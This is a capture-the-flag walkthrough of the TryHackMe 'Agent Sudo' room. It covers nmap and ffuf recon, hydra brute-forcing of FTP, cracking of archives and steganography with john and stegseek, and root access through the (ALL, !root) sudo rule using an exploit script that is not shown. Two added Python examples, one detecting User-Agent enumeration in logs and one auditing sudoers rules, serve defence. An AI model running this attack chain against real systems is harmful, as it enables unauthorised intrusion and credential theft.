DEV Community

william-barros-costa

TryHackMe - Agent Sudo

Recon

Nmap

As usual, we start with an nmap scan.

```bash
sudo nmap -sV -A -T4 10.10.227.114 -oN nmap_results.txt
"PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
|   256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
|_  256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement"
```

The scan shows three services: FTP (vsftpd 3.0.3), SSH (OpenSSH 7.6p1) and HTTP (Apache 2.4.29).

HTTP server

Homepage

The homepage tells us we need the agents' codenames (usernames) to navigate the site, and that one of the names starts with R.

Robots

The robots.txt file reveals nothing useful.

FTP

We try to log in anonymously, but the server refuses the login.

Codenames

Since we know K is a codename, we try every letter of the alphabet as the User-Agent.

```bash
echo "A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z" > alphabet.txt
ffuf -w ./alphabet.txt -u http://10.10.201.112 -H "User-Agent: FUZZ" -fc 200 -fs 218 -fmode and -o ffuf_results.txt
# We notice User-Agent: C and R have a different page
curl -A "C" -L http://10.10.201.112:80/
"Attention chris, <br><br>

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>

From,<br>
Agent R"
curl -A "R" -L http://10.10.201.112:80/
"What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>
<html>
<head>
        <title>Annoucement</title>
</head>

<body>
<p>
        Dear agents,
        <br><br>
        Use your own <b>codename</b> as user-agent to access the site.
        <br><br>
        From,<br>
        Agent R
</p>
</body>
</html>"
```

Note: by default I filter on both response size and status code, because the interesting response may differ in either one (here it was a redirect). We also pass -L to curl so that it follows redirects.

So there is an Agent C, also known as chris.
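The server-side view of the User-Agent fuzzing above, as an added example that is not part of the original write-up: a small Python detector that parses Apache combined-format access log lines and flags any client that cycles through many distinct User-Agent values within a short window. The log lines, the IP addresses, the 60-second window and the threshold of 10 distinct values are all constructed assumptions for this example.

```python
"""Detect User-Agent enumeration in Apache combined-format access logs.

Added example (not from the original post). One client sending many
requests with different User-Agent strings in a short window is the
footprint that a wordlist-driven User-Agent fuzz leaves in the access log.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return {ip, ts, status, ua} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "status": int(m["status"]),
        "ua": m["ua"],
    }


def find_ua_enumeration(lines, window=timedelta(seconds=60), min_distinct=10):
    """Return {client_ip: sorted distinct User-Agents} for every client that
    used at least `min_distinct` different User-Agent strings inside some
    sliding window of length `window`. Thresholds are assumptions."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    hits = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best = set()
        start = 0
        for end in range(len(recs)):
            # Advance the window start until the window spans at most `window`.
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            distinct = {r["ua"] for r in recs[start:end + 1]}
            if len(distinct) > len(best):
                best = distinct
        if len(best) >= min_distinct:
            hits[ip] = sorted(best)
    return hits


def _fmt(ts):
    """Format a naive datetime as Apache %t with a fixed UTC offset."""
    return ts.strftime("%d/%b/%Y:%H:%M:%S") + " +0000"


def build_sample_log():
    """Constructed sample data: one ordinary browser client (192.0.2.10) and
    one client (198.51.100.7) that sends A..Z as User-Agent one second apart,
    receiving a redirect for the two letters that matched a real codename."""
    base = datetime(2023, 9, 17, 15, 48, 0)
    lines = []
    for i in range(3):
        lines.append(
            f'192.0.2.10 - - [{_fmt(base + timedelta(seconds=10 * i))}] '
            f'"GET / HTTP/1.1" 200 218 "-" "Mozilla/5.0 (X11; Linux x86_64)"'
        )
    for i, letter in enumerate("ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
        status = 302 if letter in "CR" else 200
        lines.append(
            f'198.51.100.7 - - [{_fmt(base + timedelta(seconds=i))}] '
            f'"GET / HTTP/1.1" {status} 218 "-" "{letter}"'
        )
    return lines


if __name__ == "__main__":
    for ip, agents in find_ua_enumeration(build_sample_log()).items():
        print(f"{ip}: {len(agents)} distinct User-Agents within 60s, e.g. {agents[:5]}")
```

The benign client is never reported because it keeps one User-Agent, while the fuzzing client is reported with all 26 values it tried; on a real log you would tune the window and threshold to your own traffic and feed the output into your alerting.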

FTP Server

With a username in hand, we can try to brute-force the FTP login.

```bash
hydra -t 32 -l chris -P /usr/share/wordlists/rockyou.txt 10.10.201.112 ftp -I -o hydra_results.txt
"Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-17 15:48:41
[DATA] max 32 tasks per 1 server, overall 32 tasks, 14344399 login tries (l:1/p:14344399), ~448263 tries per task
[DATA] attacking ftp://10.10.201.112:21/
[21][ftp] host: 10.10.201.112   login: chris   password: <password>
"
```

We can now log in to the FTP server.

```bash
ftp 10.10.201.112
# chris
# <password>
ls
"-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png"
get To_agentJ.txt
get cute-alien.jpg
get cutie.png
exit
cat To_agentJ.txt
"Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C"
```

We use binwalk to carve out any files embedded in the images.

```bash
binwalk -e cutie.png
binwalk -e cute-alien.jpg
cd _cutie.png.extracted
ls
"365  365.zlib  8702.zip  To_agentR.txt"
cat To_agentR.txt
""
zip2john 8702.zip > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
"<password>            (8702.zip/To_agentR.txt)"
7z e 8702.zip
cat To_agentR.txt
"Agent C,

We need to send the picture to '<base64>' as soon as possible!

By,
Agent R
"

# Stegseek cracks the steghide passphrase with a wordlist and extracts the hidden data.
stegseek cute-alien.jpg /usr/share/wordlists/rockyou.txt
cat cute-alien.jpg.out
"
Hi james,

Glad you find this message. Your login password is <password>

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris
"
```

With the files explored and james's password recovered, we can now log in over SSH.

Entering Machine

```bash
ssh james@10.10.201.112
ls
"Alien_autospy.jpg  user_flag.txt"
cat user_flag.txt
sudo -l
"Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash"
```

Searching for the rule (ALL, !root) /bin/bash shows that this sudo configuration has a known public exploit.
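The defender's lesson from this rule, as an added example that is not part of the original write-up: `(ALL, !root)` tries to say "any user except root", but the sudoers manual itself warns that excluding users with `!` is not an effective restriction, so an audit should flag negated runas entries and replace them with an explicit list of permitted target users. The Python auditor below parses either raw sudoers lines or the command lines printed by `sudo -l`; it uses the write-up's own `sudo -l` output as one input and a constructed sudoers fragment as the other. The finding codes and the list of shell paths are assumptions of this example.

```python
"""Audit sudo rules for unreliable runas restrictions.

Added example (not from the original post). Flags two things:
  * runas-negation: a runas list that relies on "!user" to exclude someone,
    which sudoers documents as not being an effective restriction;
  * shell-command: a rule that grants a shell, i.e. unrestricted access as
    whatever runas user the rule allows.
"""
import re

# Runas specification "(users[:groups])" followed by the command list.
RUNAS_RE = re.compile(r"\((?P<spec>[^)]*)\)\s*(?P<cmds>.*)$")
# Command tags such as "NOPASSWD:" or "SETENV:" that may precede a command.
TAG_RE = re.compile(r"\b[A-Z_]+:\s*")
# Assumed set of shell paths worth flagging.
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash", "/usr/bin/sh"}

# The write-up's own `sudo -l` output, used as sample input.
SUDO_L_OUTPUT = r"""Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
"""

# Constructed sudoers fragment: the weak rule, a correctly scoped rule, and a
# rule that hands out a root shell without a password.
SUDOERS_SAMPLE = """# constructed sudoers fragment for this example
james   ALL=(ALL, !root) /bin/bash
james   ALL=(www-data) /usr/bin/systemctl restart apache2
deploy  ALL=(root) NOPASSWD: /bin/bash
"""


def parse_runas(spec):
    """Split 'ALL, !root' or 'ALL:ALL' into (users, groups) lists."""
    users_part, _, groups_part = spec.partition(":")
    users = [u.strip() for u in users_part.split(",") if u.strip()]
    groups = [g.strip() for g in groups_part.split(",") if g.strip()]
    return users, groups


def audit_runas_lines(text):
    """Return findings as dicts {'line', 'issue', 'rule', 'detail'} for each
    rule in `text` that carries a runas specification."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RUNAS_RE.search(line)
        if not m:
            continue
        users, groups = parse_runas(m["spec"])
        cmds = [TAG_RE.sub("", c).strip() for c in m["cmds"].split(",") if c.strip()]

        negated = [x for x in users + groups if x.startswith("!")]
        if negated:
            findings.append({
                "line": lineno, "issue": "runas-negation", "rule": line,
                "detail": f"negated runas entries {negated} are not a reliable "
                          f"restriction; list the permitted target users explicitly",
            })

        shells = [c for c in cmds if c and c.split()[0] in SHELLS]
        if shells:
            findings.append({
                "line": lineno, "issue": "shell-command", "rule": line,
                "detail": f"granting {shells} gives full access as runas "
                          f"user(s) {users or ['root']}",
            })
    return findings


if __name__ == "__main__":
    for label, text in (("sudo -l output", SUDO_L_OUTPUT), ("sudoers fragment", SUDOERS_SAMPLE)):
        print(f"== {label}")
        for f in audit_runas_lines(text):
            print(f"line {f['line']}: [{f['issue']}] {f['rule']}\n    {f['detail']}")
```

On the write-up's output the auditor reports both findings for the single rule; in the constructed fragment only the `(www-data) /usr/bin/systemctl restart apache2` rule passes, which is the shape a least-privilege sudo grant should take: a named target user and a specific command rather than a shell.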

Privilege Escalation

```bash
python3 exploit.py
# We are now root
cat /root/root.txt
"
To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. 

Your flag is 
<flag>

By,
<Agent-R> a.k.a Agent R
"
```
